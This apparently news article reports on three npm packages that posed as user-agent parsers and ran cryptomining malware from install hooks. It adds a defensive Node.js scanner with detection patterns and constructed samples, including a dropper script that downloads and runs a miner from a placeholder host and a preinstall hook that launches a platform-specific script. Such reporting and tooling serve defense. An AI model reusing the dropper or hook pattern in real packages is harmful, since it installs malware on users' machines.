Malicious npm Packages Mine Cryptocurrency on Windows, Linux, macOS Devices

Three JavaScript libraries published to the official npm registry were found to contain cryptocurrency-mining malware. The discovery, reported this week, shows how open-source package repositories can be abused to deliver attacks against Windows, macOS, and Linux systems.

The packages, all published by the same developer, posed as JavaScript user-agent string parsers, that is, libraries that extract browser and device details from the HTTP User-Agent header. In reality they carried cryptocurrency-mining malware.

The bad actor’s npm account was deactivated, and the three libraries, okhsa, klow, and klown, were removed from the registry on October 15, 2021. They had been downloaded 112, 4, and 65 times respectively. “Klow” and “klown” are tracked under Sonatype-2021-1472, and “okhsa” has been cataloged as Sonatype-2021-1473.

The attack ran from an install-time hook that launched a .bat script on Windows or a .sh script on Unix-based systems. Sonatype’s write-up describes the behavior:

“Packages ‘klow’ and ‘klown’ contain a cryptocurrency miner. These packages detect the current operating system at the preinstall stage, and proceed to run a .bat or .sh script depending on whether the user is running Windows or a Unix-based operating system.”

“These scripts then download an externally-hosted EXE or a Linux ELF, and execute the binary with arguments specifying the mining pool to use, the wallet to mine cryptocurrency for, and the number of CPU threads to utilize,” Sonatype security researcher Ali ElShakankiry said.
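The behavior Sonatype describes above (a preinstall hook that branches on the operating system, drops a .bat or .sh script, fetches a binary, and runs it with pool, wallet, and thread arguments) is exactly what a reviewer can look for in a package manifest before installing it. The following is an added example, not code from the article or from Sonatype: a small Node script that inspects the lifecycle hooks in a package.json object and flags the indicators mentioned in the write-up. The indicator names, the sample manifests, and the sample shell script are all constructed for illustration; none of them is the real klow, klown, or okhsa content.

```javascript
// Added example (not from the article or from Sonatype): flag npm lifecycle
// hooks and the install-time behaviour the article describes. Every sample
// manifest and script body below is constructed for illustration.

const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall",
                         "preuninstall", "postuninstall", "prepare"];

// Heuristic indicators; the labels are ours, not an npm feature.
const INDICATORS = [
  { name: "remote download",            re: /\b(curl|wget|Invoke-WebRequest|iwr)\b/i },
  { name: "platform-specific script",   re: /\.(bat|cmd|ps1|sh)\b/i },
  { name: "OS detection",               re: /process\.platform|\buname\b|%OS%/i },
  { name: "shell from node",            re: /\bnode\s+-e\b|child_process/i },
  { name: "executes downloaded binary", re: /chmod\s+\+x|\.exe\b/i },
  { name: "mining arguments",           re: /--?(pool|wallet|threads)\b|stratum\+tcp/i },
];

// Return the names of every indicator that matches the given text.
function scanText(text) {
  return INDICATORS.filter(i => i.re.test(text)).map(i => i.name);
}

// Inspect every lifecycle hook in a package.json object. Any hook is reported,
// because it means code runs at install time; matching indicators raise the
// severity of that finding.
function scanManifest(manifest) {
  const scripts = (manifest && manifest.scripts) || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== "string") continue;
    findings.push({ package: manifest.name, hook, command: cmd,
                    indicators: scanText(cmd) });
  }
  return findings;
}

// "none": no hooks; "review": hooks without indicators (e.g. native builds);
// "high": at least one hook matched an indicator.
function riskLevel(findings) {
  if (findings.length === 0) return "none";
  return findings.some(f => f.indicators.length > 0) ? "high" : "review";
}

// Constructed sample manifests (not real packages).
const SAMPLE_MANIFESTS = [
  { name: "ua-parser-benign", version: "1.0.0",
    scripts: { test: "node test.js" } },
  { name: "native-addon", version: "2.1.0",
    scripts: { install: "node-gyp rebuild" } },
  { name: "constructed-ua-parser", version: "0.0.1",
    scripts: { preinstall:
      "node -e \"require('child_process').execSync(process.platform === 'win32' ? 'run.bat' : 'sh run.sh')\"" } },
];

// Constructed dropper script body; example.invalid is a reserved, non-routable name.
const SAMPLE_SH = [
  "#!/bin/sh",
  "curl -s http://example.invalid/miner -o /tmp/miner",
  "chmod +x /tmp/miner",
  "/tmp/miner --pool pool.example.invalid:3333 --wallet WALLET --threads 4",
].join("\n");

// Stand-alone run: print a verdict per manifest and for the script body.
for (const m of SAMPLE_MANIFESTS) {
  const findings = scanManifest(m);
  console.log(`${m.name}: risk=${riskLevel(findings)}`, JSON.stringify(findings));
}
console.log("script indicators:", scanText(SAMPLE_SH));
```

To use this on a real tree, read each `node_modules/*/package.json` (and any .sh/.bat/.cmd file a hook references) and pass it to `scanManifest` or `scanText`; file reading is left out so the example runs offline. Hooks that only run `node-gyp` or similar build steps will land in "review", which is intended: install-time execution deserves a look even when no indicator fires. If you do not need native builds at all, `npm install --ignore-scripts` (or `npm config set ignore-scripts true`) prevents lifecycle hooks from running in the first place.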

This is not the first time malicious software has been found in the registry: brandjacking, typosquatting, and cryptomining packages have all been spotted before.

In June, security researchers from Sonatype and JFrog discovered packages on the PyPI repository that secretly deployed crypto-miners on affected machines. Those packages were named after repositories or components belonging to high-profile tech companies in order to carry out what are known as dependency confusion attacks.

About the author

CIM Team
